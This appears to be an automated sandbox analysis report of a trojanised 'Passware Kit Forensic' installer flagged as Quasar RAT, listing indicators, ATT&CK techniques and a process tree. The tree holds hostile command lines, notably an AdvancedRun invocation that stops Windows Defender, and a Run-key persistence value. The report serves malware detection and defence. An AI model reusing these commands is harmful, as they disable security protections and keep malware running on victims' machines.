quasar | 344b9876db6b8649b9d65448a715b1923011ea9146e116908eb4d35bd8fa3af6

Analysis

max time kernel
313s
max time network
318s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 22:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Passware Kit Forensic 2021 Pre-patched retail installer.exe
Size

381.5MB
MD5

298faa0669e7d439d1ba4a3d641cc619
SHA1

093f271f3c1b4b6e6b948ee61b01ac2c7c02a0fd
SHA256

344b9876db6b8649b9d65448a715b1923011ea9146e116908eb4d35bd8fa3af6
SHA512

0cca0f0e1f1fae77eba6f438ce53c9542811533d9015a24bebaf4fce4ba936a7642c51f25bec74171e60591f10d8bdf7f76e8e49f27e640209b81bdfcfcbda01
SSDEEP

6291456:hVqIbo0MM0kYOnyEBVToKg+IKiwA4kB88xU+WDyb/B/22aMBb7WDnexkq50NguO2:6Is0XRBV3LR4B8vm/hqMdWLeW00NgBa

Score

10^/10

quasar defense_evasion discovery evasion execution persistence privilege_escalation spyware trojan

Malware Config

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/800-71-0x0000000000400000-0x0000000000466000-memory.dmp	family_quasar

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/files/0x00020000000220f4-41.dat	Nirsoft

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3616	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

System Binary Proxy Execution: Regsvcs/Regasm 1 TTPs 2 IoCs

Abuse Regasm to proxy execution of malicious code.

defense_evasion

Regsvcs/Regasm

T1218.009

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\RegAsm.exe	ConsoleApp3.exe
Key opened	\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe	ConsoleApp3.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	ConsoleApp3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 7 IoCs

pid	Process
4184	Passware Kit Forensic 2021 Pre-patched retail installer.exe
1476	ConsoleApp3.exe
4868	AdvancedRun.exe
1872	AdvancedRun.exe
3768	RegAsm.exe
800	RegAsm.exe
3992	RegAsm.exe

Loads dropped DLL 2 IoCs

pid	Process
1884	MsiExec.exe
1884	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KitForensic = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Passware Kit Forensic\\KitForensic.exe\""	ConsoleApp3.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
19	2988	msiexec.exe
21	2988	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
41	ip-api.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\ws2_32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\sechost.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\winspool.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\msvcp_win.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\dbghelp.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\userenv.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\DLL\AcLayers.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\bcrypt.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\win32u.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\win32u.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\shlwapi.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\apphelp.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\bcrypt.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\DLL\sfc_os.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\DLL\comctl32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\UxTheme.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\advapi32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\Kernel.Appcore.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\DLL\imm32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\ole32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\tmp\WixPassware64Standalone.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\UxTheme.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\shell32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\CLBCatQ.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\msi.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\propsys.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\msiexec.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\gdi32full.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\sfc.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dbghelp.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\userenv.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\propsys.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcrt.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcp_win.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\combase.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\DLL\dbgcore.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\tmp\WixPassware64Standalone.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\profapi.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\user32.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\DRV\winspool.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\dll\sechost.pdb	MsiExec.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\apphelp.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\sechost.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\profapi.pdb	MsiExec.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	MsiExec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1476 set thread context of 800	1476	ConsoleApp3.exe	114

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5060	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4868	AdvancedRun.exe
1872	AdvancedRun.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4048	800	WerFault.exe	114

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passware Kit Forensic 2021 Pre-patched retail installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ConsoleApp3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3164	PING.EXE

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	ConsoleApp3.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3164	PING.EXE

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4868	AdvancedRun.exe
4868	AdvancedRun.exe
4868	AdvancedRun.exe
4868	AdvancedRun.exe
1872	AdvancedRun.exe
1872	AdvancedRun.exe
1872	AdvancedRun.exe
1872	AdvancedRun.exe
836	powershell.exe
836	powershell.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
1476	ConsoleApp3.exe
3616	powershell.exe
3616	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2988	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2988	msiexec.exe
Token: SeSecurityPrivilege	5008	msiexec.exe
Token: SeCreateTokenPrivilege	2988	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2988	msiexec.exe
Token: SeLockMemoryPrivilege	2988	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2988	msiexec.exe
Token: SeMachineAccountPrivilege	2988	msiexec.exe
Token: SeTcbPrivilege	2988	msiexec.exe
Token: SeSecurityPrivilege	2988	msiexec.exe
Token: SeTakeOwnershipPrivilege	2988	msiexec.exe
Token: SeLoadDriverPrivilege	2988	msiexec.exe
Token: SeSystemProfilePrivilege	2988	msiexec.exe
Token: SeSystemtimePrivilege	2988	msiexec.exe
Token: SeProfSingleProcessPrivilege	2988	msiexec.exe
Token: SeIncBasePriorityPrivilege	2988	msiexec.exe
Token: SeCreatePagefilePrivilege	2988	msiexec.exe
Token: SeCreatePermanentPrivilege	2988	msiexec.exe
Token: SeBackupPrivilege	2988	msiexec.exe
Token: SeRestorePrivilege	2988	msiexec.exe
Token: SeShutdownPrivilege	2988	msiexec.exe
Token: SeDebugPrivilege	2988	msiexec.exe
Token: SeAuditPrivilege	2988	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2988	msiexec.exe
Token: SeChangeNotifyPrivilege	2988	msiexec.exe
Token: SeRemoteShutdownPrivilege	2988	msiexec.exe
Token: SeUndockPrivilege	2988	msiexec.exe
Token: SeSyncAgentPrivilege	2988	msiexec.exe
Token: SeEnableDelegationPrivilege	2988	msiexec.exe
Token: SeManageVolumePrivilege	2988	msiexec.exe
Token: SeImpersonatePrivilege	2988	msiexec.exe
Token: SeCreateGlobalPrivilege	2988	msiexec.exe
Token: SeCreateTokenPrivilege	2988	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2988	msiexec.exe
Token: SeLockMemoryPrivilege	2988	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2988	msiexec.exe
Token: SeMachineAccountPrivilege	2988	msiexec.exe
Token: SeTcbPrivilege	2988	msiexec.exe
Token: SeSecurityPrivilege	2988	msiexec.exe
Token: SeTakeOwnershipPrivilege	2988	msiexec.exe
Token: SeLoadDriverPrivilege	2988	msiexec.exe
Token: SeSystemProfilePrivilege	2988	msiexec.exe
Token: SeSystemtimePrivilege	2988	msiexec.exe
Token: SeProfSingleProcessPrivilege	2988	msiexec.exe
Token: SeIncBasePriorityPrivilege	2988	msiexec.exe
Token: SeCreatePagefilePrivilege	2988	msiexec.exe
Token: SeCreatePermanentPrivilege	2988	msiexec.exe
Token: SeBackupPrivilege	2988	msiexec.exe
Token: SeRestorePrivilege	2988	msiexec.exe
Token: SeShutdownPrivilege	2988	msiexec.exe
Token: SeDebugPrivilege	2988	msiexec.exe
Token: SeAuditPrivilege	2988	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2988	msiexec.exe
Token: SeChangeNotifyPrivilege	2988	msiexec.exe
Token: SeRemoteShutdownPrivilege	2988	msiexec.exe
Token: SeUndockPrivilege	2988	msiexec.exe
Token: SeSyncAgentPrivilege	2988	msiexec.exe
Token: SeEnableDelegationPrivilege	2988	msiexec.exe
Token: SeManageVolumePrivilege	2988	msiexec.exe
Token: SeImpersonatePrivilege	2988	msiexec.exe
Token: SeCreateGlobalPrivilege	2988	msiexec.exe
Token: SeCreateTokenPrivilege	2988	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2988	msiexec.exe
Token: SeLockMemoryPrivilege	2988	msiexec.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
2988	msiexec.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe
4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
800	RegAsm.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 4184	4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe	95
PID 4512 wrote to memory of 4184	4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe	95
PID 4184 wrote to memory of 2988	4184	Passware Kit Forensic 2021 Pre-patched retail installer.exe	96
PID 4184 wrote to memory of 2988	4184	Passware Kit Forensic 2021 Pre-patched retail installer.exe	96
PID 5008 wrote to memory of 1884	5008	msiexec.exe	100
PID 5008 wrote to memory of 1884	5008	msiexec.exe	100
PID 4512 wrote to memory of 1476	4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe	97
PID 4512 wrote to memory of 1476	4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe	97
PID 4512 wrote to memory of 1476	4512	Passware Kit Forensic 2021 Pre-patched retail installer.exe	97
PID 1476 wrote to memory of 4868	1476	ConsoleApp3.exe	103
PID 1476 wrote to memory of 4868	1476	ConsoleApp3.exe	103
PID 1476 wrote to memory of 4868	1476	ConsoleApp3.exe	103
PID 1476 wrote to memory of 1872	1476	ConsoleApp3.exe	107
PID 1476 wrote to memory of 1872	1476	ConsoleApp3.exe	107
PID 1476 wrote to memory of 1872	1476	ConsoleApp3.exe	107
PID 1476 wrote to memory of 3064	1476	ConsoleApp3.exe	110
PID 1476 wrote to memory of 3064	1476	ConsoleApp3.exe	110
PID 1476 wrote to memory of 3064	1476	ConsoleApp3.exe	110
PID 3064 wrote to memory of 3616	3064	WScript.exe	111
PID 3064 wrote to memory of 3616	3064	WScript.exe	111
PID 3064 wrote to memory of 3616	3064	WScript.exe	111
PID 1476 wrote to memory of 3768	1476	ConsoleApp3.exe	113
PID 1476 wrote to memory of 3768	1476	ConsoleApp3.exe	113
PID 1476 wrote to memory of 3768	1476	ConsoleApp3.exe	113
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 1476 wrote to memory of 800	1476	ConsoleApp3.exe	114
PID 800 wrote to memory of 2228	800	RegAsm.exe	115
PID 800 wrote to memory of 2228	800	RegAsm.exe	115
PID 800 wrote to memory of 2228	800	RegAsm.exe	115
PID 2228 wrote to memory of 4804	2228	cmd.exe	118
PID 2228 wrote to memory of 4804	2228	cmd.exe	118
PID 2228 wrote to memory of 4804	2228	cmd.exe	118
PID 2228 wrote to memory of 3164	2228	cmd.exe	120
PID 2228 wrote to memory of 3164	2228	cmd.exe	120
PID 2228 wrote to memory of 3164	2228	cmd.exe	120
PID 2228 wrote to memory of 3992	2228	cmd.exe	122
PID 2228 wrote to memory of 3992	2228	cmd.exe	122
PID 2228 wrote to memory of 3992	2228	cmd.exe	122

C:\Users\Admin\AppData\Local\Temp\Passware Kit Forensic 2021 Pre-patched retail installer.exe
"C:\Users\Admin\AppData\Local\Temp\Passware Kit Forensic 2021 Pre-patched retail installer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Users\Admin\AppData\Local\Temp\NvTelemetry\Passware Kit Forensic 2021 Pre-patched retail installer.exe
  "C:\Users\Admin\AppData\Local\Temp\NvTelemetry\Passware Kit Forensic 2021 Pre-patched retail installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\SYSTEM32\msiexec.exe
    msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI124.tmp
    3⤵
    - Blocklisted process makes network request
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2988
- C:\Users\Admin\AppData\Local\Temp\NvTelemetry\ConsoleApp3.exe
  C:\Users\Admin\AppData\Local\Temp\NvTelemetry\ConsoleApp3.exe
  2⤵
  - System Binary Proxy Execution: Regsvcs/Regasm
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    - Access Token Manipulation: Create Process with Token
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4868
  - - C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop WinDefend
      4⤵
      Launches sc.exe
      PID:5060
- - C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
